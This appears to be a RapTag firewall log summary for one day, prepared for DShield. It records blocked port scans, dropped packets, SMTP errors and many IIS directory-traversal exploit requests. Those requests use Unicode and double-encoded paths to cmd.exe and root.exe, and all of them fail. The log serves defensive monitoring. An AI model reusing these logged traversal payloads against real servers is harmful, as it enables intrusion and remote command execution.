| Dec 08 11:01:58.836 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlM sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /2296 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:59.111 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlO sent=98 rcvd=448 srcif=Vpn3 src=216.10.47.16 /2323 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:01:59.362 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlQ sent=96 rcvd=448 srcif=Vpn3 src=216.10.47.16 /2352 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:01:59.607 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlS sent=100 rcvd=463 srcif=Vpn3 src=216.10.47.16 /2388 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:59.851 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlU sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /2416 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:22.953 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYm8 sent=72 rcvd=441 srcif=Vpn3 src=216.10.47.16 /4880 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:23.256 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYma sent=70 rcvd=439 srcif=Vpn3 src=216.10.47.16 /4909 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/MSADC/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:23.514 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmc sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /4947 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/c/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:23.772 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYme sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /4986 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:24.016 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmg sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1081 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:24.278 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmi sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /1121 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:24.567 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmk sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /1152 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:24.822 your_firewall_name httpd[214]: 121 Statistics: duration=0.01 id=5TYmm sent=145 rcvd=496 srcif=Vpn3 src=216.10.47.16 /1201 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:25.082 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmo sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1242 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:25.329 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmq sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1287 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:25.573 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYms sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1328 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:25.820 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmu sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1380 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:26.076 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmw sent=98 rcvd=448 srcif=Vpn3 src=216.10.47.16 /1424 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:09:26.320 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmy sent=96 rcvd=448 srcif=Vpn3 src=216.10.47.16 /1459 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:09:26.575 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmA sent=100 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1481 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:09:26.820 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYmC sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1511 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:12:15.421 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (198.239.87.132 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 11:12:16.906 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (198.239.87.132 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 11:12:18.406 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (198.239.87.132 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 11:19:31.574 your_firewall_name smtp[280]: 218 smtpd: Invalid SMTP protocol: Overly long line received from mailman25.vmadmin.com ([155.251.246.225]) (1026 bytes received. Configured: smtpd.max_body_line_length=1024) |
| Dec 08 11:29:03.500 your_firewall_name [102]: 226 IP packet dropped (216.78.42.4 ->192.168.10.15 : Protocol=TCP[SYN] 3540->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 11:29:06.375 your_firewall_name [102]: 226 IP packet dropped (216.78.42.4 ->192.168.10.15 : Protocol=TCP[SYN] 3540->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 11:33:48.151 your_firewall_name smtp[280]: 218 smtpd: Invalid SMTP protocol: Sending system is not 8 bit clean in 'Subject: You've Been Approved;\240$5000 Unsecured Gold Card!!!' from mail1.roi1.net ([208.254.222.6]) |
| Dec 08 14:25:00.781 your_firewall_name [102]: 226 IP packet dropped (140.119.164.129 ->192.168.10.15 : Protocol=TCP[RST] 135->47512: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 15:14:55.156 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 15:14:56.656 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 15:14:58.156 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 15:48:14.750 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (206.14.42.155 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 15:48:16.250 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (206.14.42.155 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 15:48:17.750 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (206.14.42.155 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 16:01:04.187 your_firewall_name gwcontrol: 201 ping[622133253]: access denied for 192.168.10.191 to terranode-162.cs.fiu. edu [default rule] [no rules found] |
| Dec 08 16:01:04.828 your_firewall_name gwcontrol: 201 ping[622133254]: access denied for 192.168.10.191 to terranode-162.cs.fiu. edu [default rule] [no rules found] |
| Dec 08 17:49:33.093 your_firewall_name httpd[258]: 121 Statistics: duration=4.62 id=5U2Bz sent=72 rcvd=441 srcif=Vpn3 src=216.90.30.226 /2906 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:33.362 your_firewall_name httpd[258]: 121 Statistics: duration=0.01 id=5U2BB sent=70 rcvd=439 srcif=Vpn3 src=216.90.30.226 /3204 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/MSADC/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:33.667 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BD sent=80 rcvd=449 srcif=Vpn3 src=216.90.30.226 /3222 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/c/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:33.942 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BF sent=80 rcvd=449 srcif=Vpn3 src=216.90.30.226 /3242 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:34.215 your_firewall_name httpd[258]: 121 Statistics: duration=0.01 id=5U2BH sent=96 rcvd=463 srcif=Vpn3 src=216.90.30.226 /3272 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:34.481 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BJ sent=117 rcvd=480 srcif=Vpn3 src=216.90.30.226 /3298 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:34.747 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BL sent=117 rcvd=480 srcif=Vpn3 src=216.90.30.226 /3311 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:35.016 your_firewall_name httpd[258]: 121 Statistics: duration=0.01 id=5U2BN sent=145 rcvd=496 srcif=Vpn3 src=216.90.30.226 /3332 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:35.270 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BP sent=97 rcvd=462 srcif=Vpn3 src=216.90.30.226 /3343 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:35.535 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BR sent=97 rcvd=462 srcif=Vpn3 src=216.90.30.226 /3355 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:35.819 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BT sent=97 rcvd=462 srcif=Vpn3 src=216.90.30.226 /3367 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:36.084 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BV sent=97 rcvd=462 srcif=Vpn3 src=216.90.30.226 /3379 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:36.371 your_firewall_name httpd[258]: 121 Statistics: duration=0.01 id=5U2BX sent=98 rcvd=448 srcif=Vpn3 src=216.90.30.226 /3389 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 17:49:36.637 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2BZ sent=96 rcvd=448 srcif=Vpn3 src=216.90.30.226 /3407 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 17:49:36.906 your_firewall_name httpd[258]: 121 Statistics: duration=0.01 id=5U2C1 sent=100 rcvd=463 srcif=Vpn3 src=216.90.30.226 /3423 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:49:37.167 your_firewall_name httpd[258]: 121 Statistics: duration=0.00 id=5U2C3 sent=96 rcvd=463 srcif=Vpn3 src=216.90.30.226 /3440 dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 17:52:58.171 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.236.99.25 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 17:52:59.656 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.236.99.25 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 17:53:01.156 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.236.99.25 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 19:19:07.921 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 19:19:09.406 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 19:19:10.906 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 20:50:45.821 your_firewall_name smtp[282]: 218 smtpd: Invalid SMTP protocol: Overly long line received from imo-m04.mx.aol.com ([64.12.136.7]) (1139 bytes received. Configured: smtpd.max_body_line_length=1024) |
| Dec 08 20:58:42.890 your_firewall_name [102]: 226 IP packet dropped (216.143.34.61 ->192.168.10.15 : Protocol=TCP[SYN] 4225->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 20:58:45.734 your_firewall_name [102]: 226 IP packet dropped (216.143.34.61 ->192.168.10.15 : Protocol=TCP[SYN] 4225->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 21:19:53.812 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (61.74.69.241 ->216.187.150.10: Protocol=TCP[SYN] 56027->22 |
| Dec 08 21:19:53.814 your_firewall_name [102]: 226 IP packet dropped (61.74.69.241 ->216.187.150.10 : Protocol=TCP[SYN] 56027->22: Restricted Port: Protocol=TCP[SYN] Port 56027->22 (received on interface 216.187.150.10) |
| Dec 08 21:19:54.010 your_firewall_name [102]: 226 IP packet dropped (61.74.69.241 ->192.168.10.15 : Protocol=TCP[SYN] 56032->22: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 23:19:02.734 your_firewall_name [102]: 226 IP packet dropped (206.14.92.133 ->192.168.10.15 : Protocol=TCP[SYN] 3437->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 23:19:03.231 your_firewall_name [102]: 226 IP packet dropped (206.14.92.133 ->192.168.10.15 : Protocol=TCP[SYN] 3437->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 23:19:03.733 your_firewall_name [102]: 226 IP packet dropped (206.14.92.133 ->192.168.10.15 : Protocol=TCP[SYN] 3437->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 23:21:42.640 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (24.93.67.242 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 23:21:44.140 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (24.93.67.242 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 23:21:45.640 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (24.93.67.242 ->216.187.150.10: Protocol=UDP 137->137 |
Out of 3779 total Events, 183 Events were Rejected, 4.84%
Of the 183 Events Rejected;
Restricted port attempts --------------------- 10 5.46% Port scans --------------------- 48 26.23% Broadcast/ Multicast queries --------------------- 24 13.11% Port 80/ Web exploit attempts --------------------- 80 43.72% Suspect ICMP traffic --------------------- 0.00% Pings --------------------- 2 1.09% SMTP events rejected --------------------- 4 2.19% Other traffic dropped/ blocked --------------------- 15 8.20%
RapTag is provided courtesy Tagart engineering Please send your log reports to Dshield.org